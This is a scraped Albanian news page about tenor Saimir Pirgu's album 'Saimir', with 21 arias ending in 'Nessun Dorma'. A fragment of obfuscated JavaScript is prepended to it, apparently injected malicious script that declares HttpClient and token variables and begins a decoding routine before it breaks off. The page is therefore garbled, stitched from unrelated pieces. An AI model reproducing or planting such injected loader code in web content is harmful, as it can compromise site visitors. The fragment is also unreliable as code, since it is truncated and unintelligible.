;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Albumi i Saimir Pirgut, jehonë në katër anët e globit

By

Saimir Pirgu rikthehet sërish në qendër të vëmendjes mediatike, këtë herë jo nga skenat më prestigjoze të Operas, por nga CD, e vogël në përmasa, por e çmuar në përmbajtje.

Artisti i njohur shqiptar ka publikuar albumin e tij të ri të titulluarSaimir”, album ky që ka tërhequr vëmendjen e tabloidëve dhe mediave të njohura ndërkombëtare.

Në 21 arie, tenori shqiptar shpalos të gjithë dashurinë dhe pasionin e tij për artin duke marrë frymëzim nga mentori i tij, Luçiano Pavarotti. Dhe madje, Pirgu e mbyll albumin e tij me një version të tijin tëNesunDorma”, kryevepra muzikore e krijuar nga Giacomo Puçini, e bërë e famshme pikërisht nga Pavarotti.

Saimirështë një homazh për Shqipërinë, për vendintim të lindjes”, – shprehet ndër të tjera tenori i cilësuar siTenori nga Ana e Errët e Hënës” nga prestigjozja New York Times. “Ky është album merr në një udhëtim përgjatë shekujve 19 dhe 20 në Evropë. Shijojeni!”

Këtë album lirik mund ta gjeni në të gjithë tregjetonline si Apple Music, Spotify, Deezer, Pandora, Tidal, por mund ta gjeni edhe fizikisht në ambjentet e Teatrit Kombëtar të Operas dhe Baletit në Tiranë.

https://www.opusarte.com/catalogue-detail?projectcode=6109

Artikuj të ngjashëm